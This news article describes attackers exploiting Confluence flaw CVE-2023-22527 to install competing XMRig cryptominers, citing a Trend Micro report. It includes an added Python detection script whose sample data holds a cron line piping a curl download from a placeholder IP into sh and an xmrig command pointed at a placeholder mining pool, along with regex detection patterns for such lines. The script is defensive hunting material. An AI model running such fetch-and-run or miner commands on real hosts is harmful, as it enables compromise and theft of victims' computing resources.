Major Atlassian flaw hacks systems for crypto mining

Cryptocurrency mining is most efficient with the right components. (Image credit: Shutterstock / Yevhen Vitte)

Atlassian Confluence Data Center and Confluence Server carried a maximum-severity vulnerability that allowed threat actors to execute arbitrary code remotely.

Despite the fix being available for months now, there are many unprotected endpoints out there.

As a result, hackers have been observed installing cryptocurrency miners on these devices, running up huge electricity bills for the victims and rendering the devices practically unusable.

Fighting for control

This is according to a new report from cybersecurity researchers Trend Micro. Published earlier this week, the report argues that crooks are competing with one another, deleting and installing cryptominers regularly.

The vulnerability is tracked as CVE-2023-22527. It is a critical, 10/10 severity flaw that allows remote code execution, and it was patched in mid-January this year. Since mid-June this year, however, crooks have been scanning for vulnerable instances and dropping the XMRig miner wherever possible. XMRig is the most popular cryptominer out there, generating the Monero (XMR) cryptocurrency. Monero is described as a privacy coin, as it is virtually untraceable.

"The attacks involve threat actors that employ methods such as the deployment of shell scripts and XMRig miners, targeting of SSH endpoints, killing competing crypto mining processes, and maintaining persistence via cron jobs," Trend Micro researcher Abdelrahman Esmail said.

The part about “killing competing crypto mining processes” is particularly interesting. The researcher says at least three different actors are struggling to maintain control over these endpoints. Once one of them compromises a device, it runs a shell script that terminates previous miners, deletes all existing cron jobs, uninstalls cloud security tools, and gathers system information. It then sets up a channel to its C2 server and launches a new miner.
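The behaviours described above (cron-based persistence, a download piped straight into a shell, and an XMRig process talking to a Monero mining pool) leave traces that an administrator can hunt for on a Confluence host. The script below is an added example written for this article, not code from Trend Micro or Atlassian: it scans a crontab dump and a `ps`-style process listing for generic miner indicators. The sample crontab and process lines are constructed, and the pool hostname, IP address and wallet string in them are placeholders, not indicators from the report.

```python
"""Hunt for XMRig-style miner activity in cron entries and process listings.

Added example (not from the Trend Micro report). All sample data below is
constructed; the indicators are generic XMRig/Monero traits, not report IoCs.
"""
import re
from dataclasses import dataclass, field

# The miner binary name itself.
MINER_BINARY = re.compile(r"\bxmrig\b", re.IGNORECASE)
# Monero pools are reached over the stratum protocol (stratum+tcp / stratum+ssl).
STRATUM_URL = re.compile(r"stratum\+(tcp|ssl)://[\w.-]+:\d+")
# Common XMRig command-line switches: --donate-level, --coin monero, -o <pool:port>.
XMRIG_FLAGS = re.compile(r"(--donate-level|--coin\s+monero|\s-o\s+\S+:\d+)")
# Persistence pattern seen in cron: fetch a script and pipe it directly into a shell.
FETCH_AND_RUN = re.compile(r"(curl|wget)\b[^|;]*\|\s*(ba)?sh\b")


@dataclass
class Finding:
    source: str                  # "cron" or "process"
    line: str                    # the raw line that triggered the finding
    reasons: list = field(default_factory=list)


def _reasons_for(text):
    """Return the list of generic miner indicators present in one line of text."""
    reasons = []
    if MINER_BINARY.search(text):
        reasons.append("xmrig binary name")
    if STRATUM_URL.search(text):
        reasons.append("stratum mining pool URL")
    if XMRIG_FLAGS.search(text):
        reasons.append("xmrig command-line switch")
    if FETCH_AND_RUN.search(text):
        reasons.append("download piped into shell")
    return reasons


def scan_cron(crontab_text):
    """Flag crontab entries (e.g. output of `crontab -l`) carrying miner indicators."""
    findings = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        reasons = _reasons_for(line)
        if reasons:
            findings.append(Finding("cron", line, reasons))
    return findings


def scan_processes(ps_text, cpu_threshold=90.0):
    """Flag processes in `ps -eo pid,pcpu,args` output; the header line is skipped.

    A process only becomes a finding when it carries a miner indicator; sustained
    high CPU is then recorded as an extra reason, since XMRig saturates all cores.
    """
    findings = []
    for line in ps_text.splitlines()[1:]:
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        _pid, pcpu, args = parts
        reasons = _reasons_for(args)
        if not reasons:
            continue
        try:
            if float(pcpu) >= cpu_threshold:
                reasons.append(f"sustained {pcpu}% CPU")
        except ValueError:
            pass  # malformed %CPU column; keep the indicator-based finding
        findings.append(Finding("process", line.strip(), reasons))
    return findings


# Constructed sample data: one benign cron entry, two suspicious ones;
# a benign init and Confluence JVM process, and one miner process.
SAMPLE_CRONTAB = """\
# nightly backup (legitimate)
0 3 * * * /usr/local/bin/backup.sh >/dev/null 2>&1
*/5 * * * * curl -fsSL http://198.51.100.23/i.sh | sh
@reboot /tmp/.x/xmrig -o stratum+tcp://pool.example.invalid:3333 --donate-level 0
"""
SAMPLE_PS = """\
  PID %CPU COMMAND
    1  0.0 /sbin/init
  812  0.3 /opt/atlassian/confluence/jre/bin/java -Xms1024m -Xmx1024m
 4417 98.7 /tmp/.x/xmrig -o stratum+ssl://pool.example.invalid:443 -u WALLET_PLACEHOLDER
"""

if __name__ == "__main__":
    for f in scan_cron(SAMPLE_CRONTAB) + scan_processes(SAMPLE_PS):
        print(f"[{f.source}] {f.line}\n    reasons: {', '.join(f.reasons)}")
```

On a live host you would feed `scan_cron` the output of `crontab -l` for each user (and the contents of `/etc/cron.d`) and `scan_processes` the output of `ps -eo pid,pcpu,args`; a finding is a prompt to image and investigate the machine, and a crontab that is suddenly empty on a host that used to have scheduled jobs is itself consistent with the cron-clearing behaviour the report describes.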

"With its continuous exploitation by threat actors, CVE-2023-22527 presents a significant security risk to organizations worldwide," the researcher added. "To minimize the risks and threats associated with this vulnerability, administrators should update their versions of Confluence Data Center and Confluence Server to the latest available versions as soon as possible."

Via The Hacker News


Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.
